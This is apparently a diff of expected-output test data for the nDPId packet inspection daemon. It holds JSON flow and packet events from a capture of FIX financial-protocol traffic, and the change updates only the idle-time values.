-00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} 
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"} -00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"} -00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="} 
-00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} 
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="} 
+00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 
